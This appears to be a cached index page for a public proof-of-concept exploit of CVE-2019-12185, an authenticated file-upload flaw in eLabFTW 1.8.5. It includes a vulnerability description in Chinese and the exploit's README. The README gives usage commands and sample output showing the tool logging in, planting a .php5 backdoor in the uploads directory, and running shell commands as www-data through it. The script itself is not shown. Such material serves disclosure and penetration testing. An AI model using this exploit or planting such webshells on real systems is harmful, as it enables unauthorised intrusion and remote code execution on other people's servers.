CVE-2019-12185 PoC — Elabftw 命令代码问题漏洞

Source

https://github.com/Drew-Alleman/CVE-2019-12185

Associated Vulnerability

Title:Elabftw 命令代码问题漏洞 (CVE-2019-12185)
Description:Elabftw是一套开源的实验数据托管平台。该平台运行于Linux系统中，并支持存储多种对象。 Elabftw 1.8.5版本中存在命令代码问题漏洞。该漏洞源于外部输入数据构造可执行命令过程中，网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

Description

CVE-2019-12185 - eLabFTW 1.8.5 Python3 Exploit POC

Readme

# CVE-2019-12185
eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. --> https://nvd.nist.gov/vuln/detail/CVE-2019-12185

# Example Usage
## Arguments
```
$ python3 CVE-2019-12185.py --help
usage: CVE-2019-12185.py [-h] [--shell SHELL] [-e EMAIL] [-P PASSWORD] [-u URL] [--port PORT] [--no-verify] [--silence-warnings]

eLabFTW 1.8.5 arbitrary file upload / RCE (Python3). Either use --shell to start an non-interactive shell, or provide login args to upload a new one.

options:
  -h, --help            show this help message and exit
  --shell SHELL         Full URL to existing .php5 backdoor in /uploads (e.g., https://host/uploads/..../abc.php5)
  -e, --email EMAIL     Login email
  -P, --password PASSWORD
                        Login password
  -u, --url URL         Base URL (e.g., https://192.168.1.10)
  --port PORT           Port override (defaults to 443 for https, 80 for http)
  --no-verify           Disable TLS certificate verification
  --silence-warnings    Silence urllib3 InsecureRequestWarning (effective only with --no-verify)
```                                                                                                                                                                                           
## Uploading the Reverse Shell
```
$ python3 CVE-2019-12185.py -e adm@source.pg -P password -u https://192.168.116.235 --no-verify --silence-warnings
[INFO] Disabled warnings about insecure https certifications.
[INFO] Loaded URL: 'https://192.168.116.235'
[INFO] Attempting to grab a form token from elabftw...
[INFO] Attempting to login with the provided credentials and form token...
[INFO] Succesfully sent payload to target!
[INFO] Check for a shell: https://192.168.116.235/uploads/
[INFO] Example RCE: https://192.168.116.235/uploads/82/82b757007585fa963c82b09.php5?e=whoami
```
## Finding the Backdoor
The backdoor can be found in the elabftw uploads directory.
<img width="747" height="408" alt="image" src="https://github.com/user-attachments/assets/4012a1b3-ac00-422d-92f6-f641bc12bf78" />
<img width="1857" height="374" alt="image" src="https://github.com/user-attachments/assets/5d342044-327f-4b04-ac8a-658621334370" />

## Getting a Shell
```
$ python3 CVE-2019-12185.py --shell "https://192.168.116.235/uploads/4c/4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5" --no-verify --silence-warnings
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -las
total 12
4 drwxr-xr-x 2 www-data www-data 4096 Aug 16 23:14 .
4 drwxr-xr-x 4 www-data www-data 4096 Aug 16 23:14 ..
4 -rw------- 1 www-data www-data   45 Aug 16 23:14 4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5
$ 
```

File Snapshot


 [4.0K]  /data/pocs/fc9d61455890ee744dcbe01bd53021bea785d9a6
├── [ 12K]  CVE-2019-12185.py
└── [3.0K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!